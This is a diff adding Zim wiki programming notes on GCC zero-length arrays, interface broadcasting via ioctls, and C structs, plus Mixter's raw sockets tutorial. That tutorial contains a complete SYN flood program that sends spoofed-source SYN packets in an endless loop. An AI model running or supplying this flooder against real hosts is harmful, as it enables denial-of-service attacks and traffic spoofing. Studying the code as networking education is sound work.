Add New Notes
83
Zim/Programme/#0长数组.txt#
Normal file
@@ -0,0 +1,83 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2011-04-21T16:33:24+08:00

====== Zero-length arrays ======
Created Thursday 21 April 2011

Zero-length arrays: ISO C does not allow an array of length 0, but GCC accepts one as an extension, which is convenient. The main use is to represent content whose length varies at run time.

For example:
struct line
{
    int length;
    char contents[0];
};
struct line * x = (struct line*)malloc(sizeof(struct line) + content_length);
x->length = content_length;
In standard C (C90), contents must have a length of at least 1, which makes the size passed to malloc slightly more awkward to compute.

For the variable-length content in realtang's example, it may seem better to declare the member as a pointer and allocate its storage separately:
Code:

struct line { int length; char* contents; } ...
struct line * x = (struct line*)malloc(sizeof(struct line));
x->length = content_length;
x->contents = (char *)malloc(x->length);

A typical use looks like this:
Code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
    struct line {
        int length;
        char content[0];    /* GNU C zero-length array; must be the last member */
    };
    const char *hello = "Hello";
    /* one allocation holds the header and the string, including its '\0' */
    struct line * x = (struct line*)malloc(sizeof(struct line) + strlen(hello) + 1);
    if (x == NULL)
        return 1;
    x->length = strlen(hello) + 1;
    strcpy(x->content,hello);
    printf("%s\n",x->content);
    free(x);
    return 0;
}
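
One area where a zero-length array is genuinely needed is communications. A packet consists of a header and data (payload), and the header usually has a field that gives the payload length. Sometimes there is no data to send, but to let the peer know that this side is still alive and the link has not dropped, an empty packet can be sent. A zero-length array can represent that empty payload.
On systems that do not support zero-length arrays, __the struct can be defined with the smallest possible array__ (for example, of size 1). When an empty packet is sent, however, that one-element array wastes some memory, and in high-capacity embedded systems that memory is precious. Array overruns are something the programmer has to watch for in any case, and have nothing to do with whether the declared size is 0.

The following structure also works in theory, but it is less convenient to handle because the header and payload are now separate. To send the data, memcpy has to be called twice, depending on the values of payload and length, to copy everything into the send buffer.
Code:

struct {
    unsigned int length;
    char* payload;
};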

http://gcc.gnu.org/onlinedocs/gcc/Zero-Length.html
6.17 Arrays of Length Zero

Zero-length arrays are allowed in GNU C. They are very useful as the last element of a structure which is really a header for a variable-length object:

struct line {
    int length;
    char contents[0];
};

struct line *thisline = (struct line *)
    malloc (sizeof (struct line) + this_length);
thisline->length = this_length;

In ISO C90, you would have to give contents a length of 1, which means either you waste space or complicate the argument to malloc.

In ISO C99, you would use a flexible array member, which is slightly different in syntax and semantics:

* Flexible array members are written as contents[] without the 0.
* Flexible array members have incomplete type, and so the sizeof operator may not be applied. As a quirk of the original implementation of zero-length arrays, sizeof evaluates to zero.
* Flexible array members may only appear as the last member of a struct that is otherwise non-empty.
* A structure containing a flexible array member, or a union containing such a structure (possibly recursively), may not be a member of a structure or an element of an array. (However, these uses are permitted by GCC as extensions.)
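
The C99 form described above can be sketched as follows. This is only an illustration: the helper name line_new and the choice of size_t for length are assumptions of this note, not part of the GCC manual.

```c
#include <stdlib.h>
#include <string.h>

/* Header plus variable-length payload, using a C99 flexible array member. */
struct line {
    size_t length;      /* bytes stored in contents, including the '\0' */
    char   contents[];  /* flexible array member: must be the last member */
};

/* Hypothetical helper: allocate a line holding a copy of text.
 * Returns NULL if allocation fails; release the result with free(). */
struct line *line_new(const char *text)
{
    size_t n = strlen(text) + 1;
    struct line *l = malloc(sizeof *l + n);  /* one block: header + payload */
    if (l == NULL)
        return NULL;
    l->length = n;
    memcpy(l->contents, text, n);
    return l;
}
```

Because header and payload live in one block, a single free() releases both, and the whole object can be copied or sent with one memcpy of sizeof(struct line) + length bytes.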
7
Zim/Programme/APUE.txt
Normal file
@@ -0,0 +1,7 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2011-03-27T19:02:34+08:00

====== APUE ======
Created Sunday 27 March 2011

@@ -0,0 +1,234 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2011-06-04T22:23:34+08:00

====== A brief programming tutorial in C for raw sockets ======
Created Saturday 04 June 2011
A brief programming tutorial in C for raw sockets
by Mixter for the BlackCode Magazine
http://mixter.void.ru or http://mixter.warrior2k.com

1. Raw sockets
2. The protocols IP, ICMP, TCP and UDP
3. Building and injecting datagrams
4. Basic transport layer operations

In this tutorial, you'll learn the basics of using raw sockets in C to insert any IP-based datagram into the network traffic. This is useful, for example, to build raw socket scanners like nmap, to spoof, or to perform other operations that need to send out raw packets. Basically, you can send any packet at any time, whereas with the interface functions of your system's IP stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection). For this tutorial, all you need is a minimal knowledge of socket programming in C (see http://www.ecst.csuchico.edu/~beej/guide/net/).
I. Raw sockets

The basic concept of low-level sockets is to send a single packet at a time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data at the device link layer. This means the NIC-specific header is included in the data that is written or read. For most networks, this is the Ethernet header. Of course, all subsequent protocol headers are also included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP header and all subsequent protocol headers and data.

The (simplified) link layer model looks like this:
Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) ->
Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data)

Now to some practical stuff. A standard command to create a raw socket is: socket (PF_INET, SOCK_RAW, IPPROTO_UDP); From the moment it is created, you can send any IP packets over it, and if you read() from it you receive the IP packets of that protocol that reach the host after that point. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means that to listen to TCP, UDP and ICMP traffic you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 6 for TCP, 17 for UDP and 1 for ICMP).

With this knowledge we can already create, for example, a small sniffer that dumps the contents of all TCP packets we receive. (The #include lines etc. are missing; this is just an example. As you can see, we skip the IP and TCP headers contained in the packet and print only the payload, the data of the session/application layer.)

int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */
ssize_t n;
while ((n = read (fd, buffer, sizeof (buffer) - 1)) > 0)
  {
    buffer[n] = '\0'; /* terminate, so that %s cannot run past the packet */
    if (n > (ssize_t) (sizeof (struct iphdr) + sizeof (struct tcphdr)))
      printf ("Caught tcp packet: %s\n",
              buffer+sizeof(struct iphdr)+sizeof(struct tcphdr));
  }
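
The sniffer above assumes that both headers have their minimum size of 20 bytes. A slightly more careful sketch reads the two header-length fields (described in section II) to find where the payload starts. The function name tcp_payload_offset and its error convention are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the offset of the TCP payload inside a raw IPv4 packet,
 * or -1 if the buffer is too short or does not hold IPv4 + TCP. */
long tcp_payload_offset(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)            /* version must be 4 */
        return -1;
    size_t ip_hlen = (size_t)(pkt[0] & 0x0f) * 4;  /* ip_hl counts 32-bit words */
    if (ip_hlen < 20 || len < ip_hlen + 20 || pkt[9] != 6)  /* 6 = TCP */
        return -1;
    size_t tcp_hlen = (size_t)(pkt[ip_hlen + 12] >> 4) * 4; /* th_off, in words */
    if (tcp_hlen < 20 || len < ip_hlen + tcp_hlen)
        return -1;
    return (long)(ip_hlen + tcp_hlen);
}
```

With no IP or TCP options the result is 40, the same value as sizeof(struct iphdr)+sizeof(struct tcphdr) in the sniffer.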

II. The protocols IP, ICMP, TCP and UDP

To inject your own packets, all you need to know is the structure of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (e.g. <netinet/ip.h>). You can always create your own structs, as long as the length of each field is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use little-endian notation. On big-endian machines (some processor architectures other than Intel x86), the two 4-bit fields that share a byte exchange places. However, the structures can always be used in the same way in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and what they mean.

The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits)

struct ipheader {
  unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */
  unsigned char ip_tos;
  unsigned short int ip_len;
  unsigned short int ip_id;
  unsigned short int ip_off;
  unsigned char ip_ttl;
  unsigned char ip_p;
  unsigned short int ip_sum;
  unsigned int ip_src;
  unsigned int ip_dst;
}; /* total ip header length: 20 bytes (=160 bits) */

The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.

ip_hl: the ip header length in 32-bit words. this means a value of 5 for the hl means 20 bytes (5 * 4). values other than 5 only need to be set if the ip header contains options (mostly used for routing)
ip_v: the ip version is always 4 (maybe I'll write an IPv6 tutorial later;)
ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).
ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes.
ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID.
ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off |= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits are the fragment offset: the position of this fragment's data in the original datagram, counted in units of 8 bytes.
ip_ttl: time to live is the number of hops (routers to pass) before the packet is discarded and an icmp error message is returned. the maximum is 255.
ip_p: the transport layer protocol. can be tcp (6), udp(17), icmp(1), or whatever protocol follows the ip header. look in /etc/protocols for more.
ip_sum: the checksum of the ip header (the payload is not covered). every time anything in the header changes, it needs to be recalculated, or the packet will be discarded by the next router. see III. for a checksum function.
ip_src and ip_dst: source and destination IP address as 32-bit values in network byte order, e.g. as returned by inet_addr(). both can be chosen arbitrarily.
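
The ip_sum field can be computed with the standard Internet checksum (RFC 1071). The sketch below works on raw bytes, so it gives the same result on little-endian and big-endian hosts. The name inet_checksum and the byte-oriented interface are choices made for this note, not taken from the tutorial.

```c
#include <stddef.h>
#include <stdint.h>

/* RFC 1071 Internet checksum over len bytes, read as big-endian 16-bit words.
 * Returns the checksum as a host-order number; store it high byte first. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)data[i] << 8 | data[i + 1];
    if (i < len)                      /* odd length: pad last byte with zero */
        sum += (uint32_t)data[i] << 8;
    while (sum >> 16)                 /* fold the carries back into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}
```

To fill in a header, set bytes 10 and 11 (ip_sum) to zero, run the function over the 20 header bytes, and store the result. Running it again over the finished header returns 0, which is how a receiver verifies it.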

IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Message Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered a protocol of the network layer.

struct icmpheader {
  unsigned char icmp_type;
  unsigned char icmp_code;
  unsigned short int icmp_cksum;
  /* The following data structures are ICMP type specific */
  unsigned short int icmp_id;
  unsigned short int icmp_seq;
}; /* total icmp header length: 8 bytes (=64 bits) */

icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in the ICMP include file (for example <netinet/ip_icmp.h>) for all the types.
icmp_code: this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more.
icmp_cksum: the checksum for the icmp header + data. computed the same way as the IP checksum.
Note: The next 32 bits in an icmp packet can be used in many different ways, depending on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex.
icmp_id: used in echo request/reply messages, to identify the request
icmp_seq: identifies the sequence of echo messages, if more than one is sent.

The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP, use 16-bit source and destination port numbers (up to 65535). The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and can be lost unnoticed, since they are not acknowledged using replies and sequence numbers.

struct udpheader {
  unsigned short int uh_sport;
  unsigned short int uh_dport;
  unsigned short int uh_len;
  unsigned short int uh_check;
}; /* total udp header length: 8 bytes (=64 bits) */

uh_sport: The source port that a client bind()s to, and that the contacted server sends its responses back to.
uh_dport: The destination port that a specific server can be contacted on.
uh_len: The length of udp header and payload data in bytes.
uh_check: The checksum of header and data, see IP checksum.

The Transmission Control Protocol is the most widely used transport protocol. It provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)

struct tcpheader {
  unsigned short int th_sport;
  unsigned short int th_dport;
  unsigned int th_seq;
  unsigned int th_ack;
  unsigned char th_x2:4, th_off:4;
  unsigned char th_flags;
  unsigned short int th_win;
  unsigned short int th_sum;
  unsigned short int th_urp;
}; /* total tcp header length: 20 bytes (=160 bits) */

th_sport: The source port, which has the same function as in UDP.
th_dport: The destination port, which has the same function as in UDP.
th_seq: The sequence number is used to enumerate the TCP segments. The data in a TCP connection can be contained in any number of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random.
th_ack: Every packet that is sent and is a valid part of a connection is acknowledged with a TCP segment that has the ACK flag set (see below) and whose th_ack field contains the next sequence number the receiver expects, i.e. the th_seq of the acknowledged segment plus the number of data bytes it carried.
th_x2: This is unused and contains binary zeroes.
th_off: The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5.
th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3...
TH_URG: Urgent. Marks th_urp as valid, so the receiver can handle the urgent data ahead of the rest; used for termination of a connection or to stop processes (using telnet protocol).
TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.).
TH_PSH: Push. The system's IP stack will not buffer the segment and will forward it to the application immediately (mostly used with telnet).
TH_RST: Reset. Tells the peer that the connection has been terminated.
TH_SYN: Synchronization. A segment with the SYN flag set indicates that the client wants to initiate a new connection to the destination port.
TH_FIN: Final. The connection should be closed; the peer is supposed to answer with one last segment with the FIN flag set as well.
th_win: Window. The number of bytes that can be sent before the sender must wait for an ACK.
th_sum: The checksum of pseudo header, tcp header and payload. The pseudo header is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment.
th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.
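
The pseudo header described under th_sum can be made concrete with a short sketch. It builds the 12 pseudo-header bytes and sums them together with the segment. The function names and the byte-array interface are assumptions of this note, and the code handles IPv4 only.

```c
#include <stddef.h>
#include <stdint.h>

/* Add len bytes to a running one's-complement sum (big-endian 16-bit words). */
static uint32_t sum_words(uint32_t sum, const uint8_t *p, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)p[i] << 8 | p[i + 1];
    if (i < len)
        sum += (uint32_t)p[i] << 8;   /* odd trailing byte, zero padded */
    return sum;
}

/* Checksum of a TCP segment (header + payload) including the IPv4 pseudo
 * header. src and dst hold the 4 address bytes in network order. */
uint16_t tcp_checksum(const uint8_t src[4], const uint8_t dst[4],
                      const uint8_t *segment, size_t seg_len)
{
    uint8_t pseudo[12];
    uint32_t sum;

    for (int i = 0; i < 4; i++) {
        pseudo[i] = src[i];
        pseudo[4 + i] = dst[i];
    }
    pseudo[8] = 0;                          /* the zero byte */
    pseudo[9] = 6;                          /* protocol: TCP */
    pseudo[10] = (uint8_t)(seg_len >> 8);   /* segment length, high byte */
    pseudo[11] = (uint8_t)(seg_len & 0xff); /* segment length, low byte */

    sum = sum_words(0, pseudo, sizeof pseudo);
    sum = sum_words(sum, segment, seg_len);
    while (sum >> 16)                       /* fold carries into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}
```

The pseudo header is never transmitted. It only ties the checksum to the addresses in the IP header, so a segment delivered to the wrong host fails verification.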

III. Building and injecting datagrams

Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (Syn flooder).

#define __USE_BSD	/* use bsd'ish ip header */
#include <sys/socket.h>	/* these headers are for a Linux system, but */
#include <netinet/in.h>	/* the names on other systems are easy to guess.. */
#include <netinet/ip.h>
#define __FAVOR_BSD	/* use bsd'ish tcp header */
#include <netinet/tcp.h>
#include <unistd.h>
#include <arpa/inet.h>	/* inet_addr() */
#include <stdio.h>	/* printf() */
#include <stdlib.h>	/* random() */
#include <string.h>	/* memset() */

#define P 25		/* lets flood the sendmail port */

unsigned short		/* this function generates header checksums */
csum (unsigned short *buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int
main (void)
{
  int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);	/* open raw socket */
  char datagram[4096];	/* this buffer will contain ip header, tcp header,
			   and payload. we'll point an ip header structure
			   at its beginning, and a tcp header structure after
			   that to write the header values into it */
  struct ip *iph = (struct ip *) datagram;
  /* add the offset to the char pointer first, then cast the result */
  struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
  struct sockaddr_in sin;
			/* the sockaddr_in containing the dest. address is used
			   in sendto() to determine the datagrams path */

  sin.sin_family = AF_INET;
  sin.sin_port = htons (P);/* header values wider than 1 byte must be in network
			      byte order (htons is a no-op on big endian machines) */
  sin.sin_addr.s_addr = inet_addr ("127.0.0.1");

  memset (datagram, 0, 4096);	/* zero out the buffer */

/* we'll now fill in the ip/tcp header values, see above for explanations */
  iph->ip_hl = 5;
  iph->ip_v = 4;
  iph->ip_tos = 0;
  iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);	/* no payload */
  iph->ip_id = htons (54321);	/* 16-bit field; the value doesn't matter here */
  iph->ip_off = 0;
  iph->ip_ttl = 255;
  iph->ip_p = 6;
  iph->ip_sum = 0;		/* set it to 0 before computing the actual checksum later */
  iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
  iph->ip_dst.s_addr = sin.sin_addr.s_addr;
  tcph->th_sport = htons (1234);	/* arbitrary port */
  tcph->th_dport = htons (P);
  tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
  tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
  tcph->th_x2 = 0;
  tcph->th_off = 5;		/* header length in 32-bit words, no options */
  tcph->th_flags = TH_SYN;	/* initial connection request */
  tcph->th_win = htons (65535);	/* 16-bit field; maximum allowed window size */
  tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
		      should fill in the correct checksum during transmission */
  tcph->th_urp = 0;

  /* the ip checksum covers the ip header only */
  iph->ip_sum = csum ((unsigned short *) datagram, sizeof (struct ip) >> 1);

/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
   that the kernel knows the header is included in the data, and doesn't
   insert its own header into the packet before our data */

  {				/* lets do it the ugly way.. */
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
      printf ("Warning: Cannot set HDRINCL!\n");
  }

  while (1)
    {
      if (sendto (s,		/* our socket */
		  datagram,	/* the buffer containing headers and data */
		  iph->ip_len,	/* total length of our datagram */
		  0,		/* routing flags, normally always 0 */
		  (struct sockaddr *) &sin,	/* socket addr, just like in */
		  sizeof (sin)) < 0)		/* a normal send() */
	printf ("error\n");
      else
	printf (".");
    }

  return 0;
}

IV. Basic transport layer operations

To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction to the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to examine the source of your system's IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TCP, on which I will focus.

Connection initiation: to contact a udp or tcp server listening on port 1234, the client calls connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the system's IP stack will select one to bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: server's address, TCP/UDP src: client's source port, TCP/UDP dest: port 1234. If a server is listening on port 1234 on the destination host, it will reply with a datagram containing: IP src: server, IP dst: client, srcport: server port, dstport: client's source port. If there is no server listening on the host, the client is told so and sees "Connection refused": for UDP through an ICMP unreach message (port unreachable), for TCP through a RST segment. The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out.

TCP initiation ("3-way handshake") and connection: The client starts the connection with a segment that has the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number, and an acknowledgement number equal to the client's sequence number plus one. Finally, the client replies with a tcp datagram with the ACK flag set and an acknowledgement number equal to the server's sequence number plus one. Once the connection is established, each tcp segment is sent with the ACK flag set (PSH and URG are optional), and the sequence number of each packet is the previous one incremented by the size of the previous tcp segment's data. After the amount of data specified as "window size" has been transferred, the peer sending data waits for an acknowledgement: a tcp segment with the ACK flag set whose acknowledgement number covers the last data that was received in order. That way, if any segments get lost, they are not acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set. If the connection ever de-synchronizes (aborted, bad sequence numbers, etc.), the peer that notices the error sends a RST packet with correct seq numbers to terminate the connection.
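
The sequence and acknowledgement arithmetic of the handshake can be written down in a few lines. This is a simplified sketch that ignores retransmission and out-of-order data. The names expected_ack, F_SYN and F_FIN are made up for this note, with the flag bits chosen to match TH_SYN and TH_FIN.

```c
#include <stdint.h>

#define F_FIN 0x01  /* same bit value as TH_FIN */
#define F_SYN 0x02  /* same bit value as TH_SYN */

/* Acknowledgement number a receiver sends back for one segment:
 * the sender's sequence number plus the payload length, plus one for
 * each of SYN and FIN, which consume one sequence number apiece.
 * Unsigned arithmetic wraps modulo 2^32, as TCP sequence numbers do. */
uint32_t expected_ack(uint32_t seq, uint32_t payload_len, uint8_t flags)
{
    uint32_t ack = seq + payload_len;
    if (flags & F_SYN)
        ack += 1;
    if (flags & F_FIN)
        ack += 1;
    return ack;
}
```

For a client SYN with sequence number 1000, the server's SYN/ACK carries acknowledgement number 1001. A following data segment with sequence number 1001 and 32 bytes of payload is acknowledged with 1033.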
- Mixter
@@ -0,0 +1,80 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2011-06-06T21:44:54+08:00

====== Broadcasting and determining network configuration ======
Created Monday 06 June 2011

http://uw714doc.sco.com/en/SDK_netapi/sockC.bcast_det_netconf.html
By using a datagram socket, it is possible to send broadcast packets on many networks connected to the system. The **network itself** must support broadcast; the system provides no simulation of broadcast in software. Broadcast messages can place a high load on a network since they force every host on the network to service them. Consequently, the ability to send broadcast packets has been limited to sockets that are __explicitly marked as allowing broadcasting__. Broadcast is typically used for one of two reasons: it is desired to __find a resource__ on a local network without prior knowledge of its address, or __important functions__ such as routing require that information be sent to all accessible neighbors.

To send a broadcast message, a **datagram** socket should be created:

s = socket(AF_INET, SOCK_DGRAM, 0);

The socket is marked as allowing broadcasting,

int on = 1;
setsockopt(s, SOL_SOCKET, __SO_BROADCAST__, &on, sizeof(on));

and at least a port number should be bound to the socket:

sin.sin_len = sizeof(sin); // note: sin_len comes from the FreeBSD definition of struct sockaddr
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons(MYPORT);
bind(s, (struct sockaddr *) &sin, sizeof(sin));

The destination address of the message to be broadcast __depends on the network(s)__ on which the message is to be broadcast. (Each network has its own broadcast address. The address 255.255.255.255 is generally not used; a subnet-directed broadcast address such as 192.168.1.255 should be used instead.) The Internet domain supports a shorthand notation for broadcast on the local network, the address INADDR_BROADCAST (defined in netinet/in.h). To determine the list of addresses for all reachable neighbors requires knowledge of the networks to which the host is connected. Since this information should be obtained in a host-independent fashion and may be impossible to derive, the UNIX system provides a method of retrieving this information from the system data structures. The SIOCGIFCONF ioctl call returns the interface configuration of a host as a single ifconf structure; this structure contains a ``data area'' that is made up of an array of ifreq structures, one for each address domain supported by each network interface to which the host is connected. These structures are defined in net/if.h as follows:

struct ifreq {
#define IFNAMSIZ 16
    char ifr_name[IFNAMSIZ];          /* if name, for example, "en0" */
    union {
        struct sockaddr ifru_addr;
        struct sockaddr ifru_dstaddr;
        char ifru_oname[IFNAMSIZ];    /* other if name */
        struct sockaddr ifru_broadaddr;
        short ifru_flags;
        int ifru_metric;
        char ifru_data[1];            /* interface dependent data */
        char ifru_enaddr[6];
    } ifr_ifru;

#define ifr_addr      ifr_ifru.ifru_addr      /* address */
#define ifr_dstaddr   ifr_ifru.ifru_dstaddr   /* other end of p-to-p link */
#define ifr_oname     ifr_ifru.ifru_oname     /* other if name */
#define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */
#define ifr_flags     ifr_ifru.ifru_flags     /* flags */
#define ifr_metric    ifr_ifru.ifru_metric    /* metric */
#define ifr_data      ifr_ifru.ifru_data      /* for use by interface */
#define ifr_enaddr    ifr_ifru.ifru_enaddr    /* ethernet address */
};

The call that obtains the interface configuration is:

struct ifconf ifc;
char buf[BUFSIZ];

ifc.ifc_len = sizeof(buf);
ifc.ifc_buf = buf;
if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) {
    ...
}

After this call buf will contain a list of ifreq structures, one for each network to which the host is connected. These structures will be ordered first by interface name and then by supported address families. ifc.ifc_len will have been modified to reflect the number of bytes used by the ifreq structures.

For each structure there exists a set of ``interface flags'' that tell whether the network corresponding to that interface is up or down, point to point or broadcast, and so on. The SIOCGIFFLAGS ioctl retrieves these flags for an interface specified by an ifreq structure as follows:

struct ifreq *ifr;

ifr = ifc.ifc_req;

for (n=ifc.ifc_len/sizeof(struct ifreq); --n >= 0; ifr++) {
    /*
     * We must be careful that we don't use an interface
     * devoted to an address domain other than those intended
     */
    if (ifr->ifr_addr.sa_family != AF_INET)
        continue;
    if (ioctl(s, SIOCGIFFLAGS, (char *) ifr) < 0) {
        ...
    }
    /*
     * Skip boring cases
     */
    if ((ifr->ifr_flags & IFF_UP) == 0 ||
        (ifr->ifr_flags & IFF_LOOPBACK) ||
        (ifr->ifr_flags & (IFF_BROADCAST | IFF_POINTOPOINT)) == 0)
        continue;
}

Once the flags have been obtained, the broadcast address must be obtained. With broadcast networks this is done via the SIOCGIFBRDADDR ioctl, while for point-to-point networks the address of the destination host is obtained with SIOCGIFDSTADDR.

struct sockaddr dst;

if (ifr->ifr_flags & IFF_POINTOPOINT) {
    if (ioctl(s, SIOCGIFDSTADDR, (char *) ifr) < 0) {
        ...
    }
    memcpy((char *) &dst, (char *) &ifr->ifr_dstaddr, sizeof(ifr->ifr_dstaddr));
} else if (ifr->ifr_flags & IFF_BROADCAST) {
    if (ioctl(s, SIOCGIFBRDADDR, (char *) ifr) < 0) {
        ...
    }
    memcpy((char *) &dst, (char *) &ifr->ifr_broadaddr, sizeof(ifr->ifr_broadaddr));
}

After the appropriate ioctl(2) has obtained the broadcast or destination address (now in dst), the sendto call may be used:

sendto(s, buf, buflen, 0, (struct sockaddr *)&dst,
    sizeof(dst));

In the above loop one sendto occurs for every interface to which the host is connected that supports the notion of broadcast or point-to-point addressing. If a process only wished to send broadcast messages on a given network, code similar to that outlined above would be used, but the loop would need to find the correct destination address.

Received broadcast messages contain the sender's address and port, as datagram sockets are bound before a message is allowed to go out.
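
The subnet-directed broadcast address mentioned in the note above (for example 192.168.1.255) follows directly from an interface address and its netmask. The helper below is a sketch of that arithmetic only; its name is made up for this note, and in a real program the address would normally come from the SIOCGIFBRDADDR ioctl shown earlier.

```c
#include <stdint.h>

/* Directed broadcast address of a subnet: keep the network bits and set
 * every host bit. Both arguments and the result are in host byte order. */
uint32_t directed_broadcast(uint32_t addr, uint32_t netmask)
{
    return (addr & netmask) | ~netmask;
}
```

For 192.168.1.10 with netmask 255.255.255.0 this gives 192.168.1.255. Apply htonl() to the result before storing it in sin_addr.s_addr.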
328
Zim/Programme/APUE/C&C+语言struct深层探索.txt
Normal file
@@ -0,0 +1,328 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:40:33+08:00
|
||||
|
||||
====== C&C+语言struct深层探索 ======
|
||||
Created 星期六 04 六月 2011
|
||||
C/C+语言struct深层探索
|
||||
|
||||
===== 1. struct的巨大作用 =====
|
||||
|
||||
面对一个人的大型C/C++程序时,只看其对struct的使用情况我们就可以对其编写者的编程经验进行评估。因为一个大型的C/C++程序,势必要涉及一些(甚至大量)进行数据组合的结构体,这些结构体可以将原本意义属于一个整体的数据组合在一起。从某种程度上来说,会不会用struct,怎样用struct是区别一个开发人员是否具备丰富开发经历的标志。
|
||||
|
||||
在网络协议、通信控制、嵌入式系统的C/C++编程中,我们经常要传送的不是简单的字节流(char型数组),而是多种数据组合起来的一个整体,其表现形式是一个结构体。
|
||||
|
||||
经验不足的开发人员往往将所有需要传送的内容依顺序保存在**char型数组**中,通过**指针偏移**的方法传送网络报文等信息。这样做编程复杂,易出错,而且一旦控制方式及通信协议有所变化,程序就要进行非常细致的修改。
|
||||
|
||||
一个有经验的开发者则灵活运用结构体,举一个例子,假设网络或控制协议中需要传送三种报文,其格式分别为packetA、packetB、packetC:
|
||||
|
||||
struct structA
|
